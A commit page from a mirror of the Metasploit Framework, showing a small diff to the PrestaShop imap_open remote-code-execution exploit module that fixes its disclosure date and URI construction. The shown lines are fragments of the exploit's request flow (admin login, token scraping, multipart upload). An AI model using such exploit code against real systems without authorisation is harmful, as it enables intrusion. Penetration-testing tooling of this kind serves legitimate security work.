infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fix normalize and date

GSoC/Meterpreter_Web_Console
h00die 2018-11-19 04:00:58 -05:00
parent aca3f44c9b
commit a28feed7d8
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/linux/http/php_imap_open_rce.rb
View File

@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'prestashop', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 19 2018'))
'DisclosureDate' => 'Oct 23 2018'))
register_options(
[
@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path) + '/index.php',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'cookie' => cookie,
'vars_post' => {
'ajax' => 1,
@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
/AdminCustomerThreads&amp;token=(?<token>\w{32})/ =~ res.body
vprint_status("Customer Threads Token: #{token}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path) + '/index.php',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'cookie' => cookie,
'vars_get' => {
'controller' => 'AdminCustomerThreads',
@ -157,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path) + '/index.php',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie,